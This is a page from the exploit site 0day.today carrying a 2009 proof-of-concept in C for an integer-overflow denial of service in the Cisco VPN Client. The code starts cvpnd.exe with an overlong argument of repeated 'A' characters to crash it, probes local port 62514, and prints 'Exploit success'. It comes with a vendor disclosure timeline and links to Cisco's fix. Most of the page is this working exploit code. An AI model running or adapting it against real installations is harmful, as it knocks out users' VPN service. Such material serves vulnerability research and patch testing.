0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Cisco VPN Client Integer Overflow (DOS)
======================================= Cisco VPN Client Integer Overflow (DOS) ======================================= # Title: Cisco VPN Client Integer Overflow (DOS) # CVE-ID: () # OSVDB-ID: () # Author: Alex Hernandez # Published: 2009-11-21 # Verified: yes view source print? /* Cisco VPN client version 5.0.03.0560 Cisco VPN client Version 5.0.04.0300 Cisco VPN client Version 5.0.05.0290 Cisco VPN client Version 4.8.02.0010 */ /* * Cisco VPN Client 0day Integer overflow (DOS) Proof Of Concept Code * * By Alex Hernandez aka alt3kx (c) November 2009 * * This POC is only for test. If an application read a malformed chars * file like this POC, the application will be crashed. * * We tested this code on: * * Windows Vista Bussines SP1 Spanish * Windows Vista Home Premium SP1 English * Windows 2000 Server English * Windows XP Professional SP3 * * Cisco VPN client version 5.0.03.0560 * Cisco VPN client Version 5.0.04.0300 * Cisco VPN client Version 5.0.05.0290 * Cisco VPN client Version 4.8.02.0010 * * Compiled on VC++ win32 * * Friends: * sirdarckcat, nitr0us, hkm, crypkey, xDAWN, canit0, chr1x * * TT & DSRT * daSh, p4r4n01ds, darkslaker, beto, motis. * * Very special credits to: * * str0ke (milw0rm.com) * rathaus (securiteam.com) * FX (Phenoelit.de) * dSR! (segfault.es) * 0dd (0dd.com) * * * PH-Neutral 0x7d9, We hope to see u there intruders * * --------------- * Report Timeline * --------------- * 06/03/2009 The vulnerability was discovered. * 07/03/2009 Exploit/PoC code was developed (private). * 09/03/2009 Cisco PSIRT was notified about the issue. * 11/03/2009 Vendor response asking for details of the testing environment. * 12/03/2009 Test scenario explained and sent a PDF document with details. * 16/03/2009 Developers/PSIRT confirmed the vulnerability. * 19/03/2009 New test scenarios around new versions (CISCO VPN client). * 23/03/2009 CISCO PSIRT assing an internal tracking PSIRT-0676131279. * 23/03/2009 CISCO PSIRT assing an Bug ID-CSCsz49276. * 15/04/2009 New Advisory release (private). * 16/04/2009 New PSIRT feedback no ETA avaiable. * 23/04/2009 The development team working the fix. * 01/05/2009 The development team estimated one month to fix. * 01/06/2009 New PSIRT feedback, no ETA available. * 29/06/2009 The development team estimated one month to fix. * 28/07/2009 The development team working on maitenance release. * 28/07/2009 The development team estimated one month to fix. * 02/09/2009 New vulnerabilities found on CISCO VPN client. * 02/09/2009 The development team can not publish the new version 5.0.6. * 02/09/2009 The development team working on maitenance release. * 02/09/2009 The development team estimated one month to fix. * 10/09/2009 The BETA program should be finished by the end of Oct * and the client posted next month. * 07/10/2009 The development team estimated one month to fix. * 11/11/2009 New PSIRT feedback RNA avaiable. * 19/11/2009 The vulnerability goes public and PSIRT is informed. * 19/11/2009 Fix and details will available on CISCO Intellishield Alert & Bug Tool kit. * * CISCO Fix and Details: * * BugToolKit: * http://tools.cisco.com/Support/BugToolKit/search/getBugDetails.do?method=fetchBugDetails&bugId=CSCsz49276 * * Intellishield Alert: * http://tools.cisco.com/security/center/viewAlert.x?alertId=19445 * */ #include <windows.h> #include <winsock.h> #include <stdio.h> #pragma comment ( lib, "ws2_32.lib" ) int CheckPortUDP( short int nPort ) { struct sockaddr_in nSockServer; WSADATA wsaData; int lBusy = 0; int nSocket; /* Initialization */ if( WSAStartup( 0x0101, &wsaData ) == 0 ) { /* Create Socket */ nSockServer.sin_family = AF_INET; nSockServer.sin_port = htons( nPort ); nSockServer.sin_addr.s_addr = inet_addr( "127.0.0.1" ); /* Check UDP Protocol */ nSocket = socket( AF_INET, SOCK_DGRAM, 0 ); lBusy = ( bind( nSocket, (SOCKADDR FAR *) &nSockServer, sizeof( SOCKADDR_IN ) ) == SOCKET_ERROR ); /* Close Socket if Busy */ if( lBusy ) closesocket( nSocket ); /* Close Winsock */ WSACleanup(); } /* Return */ return( lBusy ); } int CheckPortTCP( short int nPort ) { struct sockaddr_in nSockServer; WSADATA wsaData; int lBusy = 0; int nSocket; /* Initialization */ if( WSAStartup( 0x0101, &wsaData ) == 0 ) { /* Create Socket */ nSockServer.sin_family = AF_INET; nSockServer.sin_port = htons( nPort ); nSockServer.sin_addr.s_addr = inet_addr( "127.0.0.1" ); /* Check TCP Protocol */ nSocket = socket( AF_INET, SOCK_STREAM, 0 ); lBusy = ( connect( nSocket, (struct sockaddr *) &nSockServer, sizeof( nSockServer ) ) == 0 ); /* Close Socket if Busy */ if( lBusy ) closesocket( nSocket ); /* Close Winsock */ WSACleanup(); } /* Return */ return( lBusy ); } int main(void) { char szPath[] = "C:\\Program Files\\Cisco Systems\\VPN Client\\cvpnd.exe"; //uncomment this line for Windows XP Spanish versions //char szPath[] = "C:\\Archivos de programa\\Cisco Systems\\VPN Client\\cvpnd.exe"; char buffer[] = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"; PROCESS_INFORMATION pif; STARTUPINFO si; ZeroMemory(&si,sizeof(si)); si.cb = sizeof(si); BOOL bRet = CreateProcess( szPath, buffer, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pif); system("cls"); printf("\n .:: Cisco VPN Client 0day Integer overflow (DoS) Proof Of Concept Code ::.\n"); printf(" .:: By Alex Hernandez aka alt3kx (c) November 2009 .::\n\n"); /* Check for TCP Port */ if( CheckPortTCP(62514) ) printf("[+] Cisco VPN Client TCP port listening\t[OK!]\n"); else printf("[+] Cisco VPN Client TCP Port isn't Busy\t[Wrong!]\n"); /* Check for UDP Port */ if( CheckPortUDP(62514) ) printf("[+] Cisco VPN Client UDP port listening\t[OK!]\n"); else printf("[+] Cisco VPN Client UDP Port isn't Busy\t[Wrong!]\n"); if(bRet == FALSE){MessageBox(HWND_DESKTOP,"Unable to start program check the default PATH Cisco VPN Client cvpnd.exe\n","",MB_OK); return 1;} else if (bRet == TRUE){MessageBox(HWND_DESKTOP,"Attempting exploit Cisco VPN DoS exploit...","",MB_OK); printf("\n[+] Few seconds to crash the program...\n"); printf("[+] Exploit success...\n\n"); return 1;} CloseHandle(pif.hProcess); CloseHandle(pif.hThread); } # 0day.today [2024-12-23] #